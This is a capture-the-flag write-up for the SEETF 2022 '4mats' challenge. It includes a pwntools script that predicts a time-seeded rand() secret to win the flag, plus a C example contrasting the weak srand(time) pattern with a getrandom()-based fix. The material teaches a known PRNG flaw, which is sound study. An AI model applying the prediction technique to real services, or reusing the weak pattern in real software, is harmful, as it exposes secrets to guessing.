Social Engineering Experts CTF 2022: 4mats

TL;DR

  • The challenge uses libc rand() to generate a secret number.
  • srand(time(NULL)) seeds the PRNG with the current timestamp.
  • Server and client time are close enough to predict the output.
  • Locally call srand(time()) and rand() to reproduce the value.
  • Submit the predicted number to get the flag.

Description

Let's get to know each other

Solution

from pwn import *
from time import time
from ctypes import CDLL

# This will automatically get context arch, bits, os etc
elf = context.binary = ELF('./vuln', checksec=False)

# Lib-C for rand()
libc = CDLL('/lib/x86_64-linux-gnu/libc.so.6')

# Create process (level used to reduce noise)
io = process(level='error')  # Local
# io = remote('fun.chall.seetf.sg', 50001)  # Remote

io.sendlineafter(b':', b'crypto')  # Submit name

io.sendlineafter(b'2. Do I know you?', b'1')  # Guess value

libc.srand(int(time()))  # Call srand() with current time as seed
guess = libc.rand() % 1000000  # Same seed gives the same first rand() output, so this is the server's number

io.sendlineafter(b'Guess my favourite number!', str(guess).encode())  # Submit guess

io.recvlines(2)
info(io.recv().decode())  # Print flag

Flag: SEE{4_f0r_4_f0rm4t5_0ebdc2b23c751d965866afe115f309ef}
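
Added example (not part of the original write-up or the challenge source): the time-seeded pattern next to a hardened replacement. weak_secret() is reconstructed from the TL;DR and the solve script (srand(time), rand() % 1000000); secure_secret() and RANGE are hypothetical names, and getrandom() assumes Linux with glibc 2.25 or later.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <time.h>
#include <sys/random.h>   /* getrandom() */

#define RANGE 1000000u

/* Weak: the result is a pure function of the seed, and the seed is the
 * wall clock, which anyone with a roughly synchronised clock also knows. */
unsigned weak_secret(time_t seed)
{
    srand((unsigned)seed);
    return (unsigned)rand() % RANGE;
}

/* Hardened: draw from the kernel CSPRNG. Rejection sampling discards the
 * top partial cycle so the modulo does not bias the result.
 * Returns 0 on success, -1 if the kernel call fails. */
int secure_secret(unsigned *out)
{
    const uint32_t limit = UINT32_MAX - (UINT32_MAX % RANGE); /* multiple of RANGE */
    uint32_t r;
    do {
        if (getrandom(&r, sizeof r, 0) != (ssize_t)sizeof r)
            return -1;
    } while (r >= limit);
    *out = r % RANGE;
    return 0;
}

int main(void)
{
    time_t now = time(NULL);
    /* Two parties that agree on the current second agree on the "secret". */
    printf("server side: %06u\n", weak_secret(now));
    printf("observer   : %06u\n", weak_secret(now));

    unsigned s;
    if (secure_secret(&s) != 0) { perror("getrandom"); return 1; }
    printf("getrandom  : %06u\n", s);
    return 0;
}
```

The first two lines always match because nothing but the timestamp feeds the generator; the third depends on kernel entropy and cannot be reproduced from the clock.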